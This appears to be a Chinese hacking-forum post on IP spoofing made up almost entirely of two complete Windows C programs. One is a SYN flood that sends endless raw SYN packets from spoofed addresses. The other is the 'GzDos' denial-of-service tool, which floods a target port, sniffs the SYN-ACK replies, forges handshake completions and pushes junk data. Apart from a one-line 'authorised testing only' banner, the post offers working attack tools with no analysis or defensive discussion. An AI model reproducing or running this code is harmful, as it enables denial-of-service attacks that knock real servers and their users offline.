伪造ip
引用:8楼 http://forum.eviloctal.com/thread-14251-1-1.html
syn flood
代码:
#pragma comment (lib,"Ws2_32.lib")
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#define SEQ 0x28376839
#define SYN_DEST_IP "10.0.0.125"//被攻击的IP
#define FAKE_IP "12.34.56.78" //伪装IP的起始值,本程序的伪装IP覆盖一个B类网段
#define STATUS_FAILED 0xFFFF //错误返回值
typedef struct _iphdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
struct //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;
typedef struct _tcphdr //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;
//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) {
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
// SynFlood主函数
int main()
{
int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;
int TimeOut=2000,SendSEQ=0;
char SendBuf[128]={0};
char RecvBuf[65535]={0};
WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
//初始化SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode);
ExitProcess(STATUS_FAILED);
}
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if (SockRaw==INVALID_SOCKET){
fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError());
ExitProcess(STATUS_FAILED);
}
flag=TRUE;
//设置IP_HDRINCL以自己填充IP首部
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n");
__try{
//设置发送超时
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR){
fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError());
__leave;
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
FakeIpNet=inet_addr(FAKE_IP);
FakeIpHost=ntohl(FakeIpNet);
//填充IP首部
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));
//高四位IP版本号,低四位首部长度
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度(字节)
ip_header.ident=1; //16位标识
ip_header.frag_and_flags=0; //3位标志位
ip_header.ttl=128; //8位生存时间TTL
ip_header.proto=IPPROTO_TCP; //8位协议(TCP,UDP…)
ip_header.checksum=0; //16位IP首部校验和
ip_header.sourceIP=htonl(FakeIpHost); //32位源IP地址
ip_header.destIP=inet_addr(SYN_DEST_IP); //32位目的IP地址
//填充TCP首部
tcp_header.th_sport=htons(7000); //源端口号
tcp_header.th_dport=htons(139); //目的端口号
tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号
tcp_header.th_ack=0; //ACK序列号置为0
tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位
tcp_header.th_flag=2; //SYN 标志
tcp_header.th_win=htons(16384); //窗口大小
tcp_header.th_urp=0; //偏移
tcp_header.th_sum=0; //校验和
//填充TCP伪首部(用于计算校验和,并不真正发送)
psd_header.saddr=ip_header.sourceIP; //源地址
psd_header.daddr=ip_header.destIP; //目的地址
psd_header.mbz=0;
psd_header.ptcl=IPPROTO_TCP; //协议类型
psd_header.tcpl=htons(sizeof(tcp_header)); //TCP首部长度
while(1) {
//每发送10,240个报文输出一个标示符
printf(".");
for(counter=0;counter<10240;counter++){
if(SendSEQ++==65536) SendSEQ=1; //序列号循环
//更改IP首部
ip_header.checksum=0; //16位IP首部校验和
ip_header.sourceIP=htonl(FakeIpHost); //32位源IP地址
//更改TCP首部
tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN序列号
tcp_header.th_sum=0; //校验和
//更改TCP Pseudo Header
psd_header.saddr=ip_header.sourceIP;
//计算TCP校验和,计算校验和时需要包括TCP pseudo header
memcpy(SendBuf,&psd_header,sizeof(psd_header));
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
//计算IP校验和
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4);
datasize=sizeof(ip_header)+sizeof(tcp_header);
ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
//填充发送缓冲区
memcpy(SendBuf,&ip_header,sizeof(ip_header));
//发送TCP报文
ErrorCode=sendto(SockRaw,
SendBuf,
datasize,
0,
(struct sockaddr*) &DestAddr,
sizeof(DestAddr));
if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError());
}//End of for
}//End of While
}//End of try
__finally {
if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
WSACleanup();
}
return 0;
}复制内容到剪贴板
代码:
#include "stdio.h"
#include "winsock2.h"
#include "windows.h"
#include <ws2tcpip.h>
#include "wchar.h"
#pragma comment(lib, "ws2_32.lib")
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
char* ATTACKIP = "10.0.0.25";
USHORT ATTACKPORT = 135;
USHORT StartPort = 1;
int SLEEPTIME = 2000;
UCHAR* optbuf = NULL; // 选项字节
char* psend = NULL;
DWORD len = 0;
USHORT optlen= 0;
typedef struct ip_head
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IPHEADER;
typedef struct tcp_head
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCPHEADER;
typedef struct tsd_hdr
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSDHEADER;
typedef struct attack_obj
{
DWORD dwIP;
USHORT uAttackPort[11];
struct attack_obj* Next;
}ATOBJ;
ATOBJ* ListAttackObj=0;
////////////////////////////////////////////////////
BOOL InitStart();
DWORD GetHostIP();
USHORT checksum(USHORT *buffer, int size);
DWORD WINAPI ThreadSynFlood(LPVOID lp);
void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT
APort, DWORD SIP, DWORD AIP, char* pBuf,BOOL Isdata,DWORD
dwSize);
DWORD WINAPI ListeningFunc(LPVOID lpvoid);
void Banner();
void debugip ( DWORD dwip);
void ConvertOpt (CHAR* pu);
////////////////////////////////////////////////////
SOCKET sock = NULL;
int main(int argc, char* argv[])
{
Banner();
psend = (char*)malloc(800);
memset(psend,0x38,799);
psend[799] = 0;
len = strlen(psend);
if ( argc < 5)
{
printf("input error!\n");
return -1;
}
ATTACKIP = strdup(argv[1]);
ATTACKPORT = atoi(argv[2]);
CHAR* optbuftemp = (CHAR*)strdup(argv[3]);
ConvertOpt (optbuftemp);
optbuf[3]-=1;
if ( argc == 5)
SLEEPTIME = atoi(argv[4]);
if ( argc == 6)
{
SLEEPTIME = atoi(argv[4]);
StartPort = atoi(argv[5]);
}
char HostName[255]={0};
if ( InitStart() == FALSE )
return -1;
if ( optbuf != NULL)
{
int i=0;
struct hostent* lp = NULL;
gethostname(HostName,255);
lp= gethostbyname (HostName);
while ( lp->h_addr_list[i] != NULL )
{
HANDLE h=NULL;
DWORD dwIP=0;
dwIP = *(DWORD*)lp->h_addr_list[i++];
h=CreateThread(NULL,NULL,ListeningFunc,(LPVOID)
dwIP,NULL,NULL);
if ( h == NULL )
{
printf("Create ListeningFunc Thread False!\n");
return -1;
}
Sleep(500);
}
ThreadSynFlood(NULL);
}
else return -1;
Sleep(5555555);
}
BOOL InitStart()
{
BOOL flag;
int nTimeOver;
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return FALSE;
}
ListAttackObj = (ATOBJ*) calloc (1,sizeof(ATOBJ));
ListAttackObj->dwIP = inet_addr( ATTACKIP );//DWORD dwIP;
ListAttackObj->uAttackPort[0] = htons(ATTACKPORT);//USHORT uAttackPort[11];
ListAttackObj->uAttackPort[1] = 0;
ListAttackObj->Next=NULL; //struct attack_obj* Next;
sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))
==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return FALSE;
}
flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof
(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return FALSE;
}
nTimeOver=2000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver,
sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时
//间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return FALSE;
}
return TRUE;
}
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
ATOBJ* pAtObj = ListAttackObj;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[1024]={0};
int i=0;
while ( pAtObj != NULL )
{
addr_in.sin_family=AF_INET;
addr_in.sin_addr.S_un.S_addr=pAtObj->dwIP;
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned
long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)
+optlen); //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0x0040;
ipHeader.ttl=0x80;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=pAtObj->dwIP;
ipHeader.sourceIP = GetHostIP();
tcpHeader.th_ack=0;
tcpHeader.th_lenres = (optlen/4+5)<<4;
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(0x4470);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x00198288);
for ( int l=StartPort; l<65535;l++)
{
int k =0;
while ( pAtObj->uAttackPort[k] != 0 )
{
tcpHeader.th_dport=pAtObj->uAttackPort[k++];
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
int sendnum = 0;
int optlentemp = optlen;
tcpHeader.th_sport=htons(l);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof
(tcpHeader));
memcpy(szSendBuf+sizeof(psdHeader)+sizeof
(tcpHeader),optbuf,optlentemp);
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof
(psdHeader)+sizeof(tcpHeader)+optlentemp);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-
(USHORT)optlentemp);
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof
(tcpHeader));
memcpy(szSendBuf+sizeof(ipHeader)+sizeof
(tcpHeader),optbuf,optlentemp);
int rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof
(tcpHeader)+optlentemp, 0, (struct sockaddr*)&addr_in, sizeof
(addr_in));
if ( sendnum++ > 10 )
{
sendnum=0;
}
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf(" send ok %d \n", l);
}//endwhile
Sleep(SLEEPTIME);
}
pAtObj = pAtObj->Next;
}
return 0;
}
DWORD GetHostIP()
{
DWORD dwIP=0;
int i=0;
struct hostent* lp = NULL;
char HostName[255] = {0};
gethostname(HostName,255);
lp = gethostbyname (HostName);
while ( lp->h_addr_list[i] != NULL )
i++;
dwIP = *(DWORD*)lp->h_addr_list[--i];
return dwIP;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
SOCKET rawsock;
SOCKADDR_IN addr_in={0};
if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))
==INVALID_SOCKET)
{
printf("Sniffer Socket Setup Error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(8288);
addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid;
//对rawsock绑定本机IP和端口
int ret=bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
if(ret==SOCKET_ERROR)
{
printf("bind false\n");
exit(0);
}
DWORD lpvBuffer = 1;
DWORD lpcbBytesReturned = 0;
WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0,
&lpcbBytesReturned, NULL, NULL);
while (TRUE)
{
SOCKADDR_IN from={0};
int size=sizeof(from);
char RecvBuf[256]={0};
//接收数据包
ret=recvfrom(rawsock,RecvBuf,sizeof(RecvBuf),0,(struct
sockaddr*)&from,&size);
if(ret!=SOCKET_ERROR)
{
// 分析数据包
IPHEADER *lpIPheader;
lpIPheader=(IPHEADER *)RecvBuf;
if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP
== inet_addr(ATTACKIP) )
{
TCPHEADER *lpTCPheader=(TCPHEADER*)(RecvBuf+sizeof
(IPHEADER));
//判断是不是远程开放端口返回的数据包
if ( lpTCPheader->th_flag==0x12)
{
if ( lpTCPheader->th_ack == htonl(0x00198289) )
{//伪造第3次握手
SendData(lpTCPheader->th_ack,htonl(ntohl
(lpTCPheader->th_seq)+1), \
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0);
//主动发出一次数据
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}
}
else
{
if ( lpTCPheader->th_flag == 0x10 )
//继续发送数据
SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,\
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}
}
}
} // end while
}
void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT
APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD
dwSize)
{
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
char szSendBuf[1024]={0};
addr_in.sin_family=AF_INET;
addr_in.sin_port = APort;
addr_in.sin_addr.S_un.S_addr = AIP;
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.ident=1;
ipHeader.frag_and_flags=0x0040;
ipHeader.ttl=0x80;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=AIP;
ipHeader.sourceIP = SIP;
tcpHeader.th_dport = APort;
tcpHeader.th_ack = ACK;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_seq= SEQ;
tcpHeader.th_win=htons(0x4470);
tcpHeader.th_sport=SPort;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)
+dwSize);
if ( !Isdata)
{
tcpHeader.th_flag=0x10;
}// ack
else
{
tcpHeader.th_flag=0x18;
}
tcpHeader.th_urp=0;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof
(tcpHeader));
if ( pBuf != NULL )
{
memcpy(szSendBuf+sizeof(psdHeader)+sizeof
(tcpHeader),pBuf,dwSize);
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof
(psdHeader)+sizeof(tcpHeader)+dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)
dwSize);
}
else
{
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof
(psdHeader)+sizeof(tcpHeader));
}
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof
(tcpHeader));
int rect=0;
if ( pBuf == NULL )
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),
0, (struct sockaddr*)&addr_in, sizeof(addr_in));
else
{
memcpy(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), pBuf,
dwSize);
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)
+dwSize, 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
}
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return;
}
else
{
if ( pBuf != NULL )
printf("SendData ok %d\n",ntohs(SPort));
else
printf(" SendAck ok %d\n",ntohs(SPort));
}
}
void Banner()
{
printf
("****************************************************\n");
printf(" 狗仔 D.o.S test\n");
printf("Maker By LionD8. QQ:10415468. Email:liond8@eyou.com\n");
printf(" Welcome to my website: [url]http://liond8.126.com[/url]\n" );
printf(" 仅供授权测试使用,否则引起任何法律纠纷后果自负\n");
printf
("****************************************************\n");
printf("GzDos.exe <Attack IP> <Attack Port> <OptString> <SleepTime = default 2000> <StartPort>\n");
}
void debugip ( DWORD dwip)
{
struct in_addr A = {0};
A.S_un.S_addr = dwip;
printf("%s",inet_ntoa(A));
}
void ConvertOpt (CHAR* pu)
{
int i=0 , lentemp;
lentemp = strlen(pu);
optlen = lentemp/2;
optbuf = (UCHAR*)malloc(optlen);
int k=0;
for ( i = 0 ; i < lentemp ; i+=2 )
{
BYTE tempb = 0;
tempb = pu[i+1];
if ( tempb < '9')
tempb = tempb - 0x30;
else
{
tempb = tempb - 0x37;
}
optbuf[k] = tempb;
tempb = 0;
tempb = pu[i];
if ( tempb < '9')
tempb = tempb - 0x30;
else
{
tempb = tempb - 0x37;
}
tempb= tempb<<4;
optbuf[k]+= tempb;
k++;
}
}
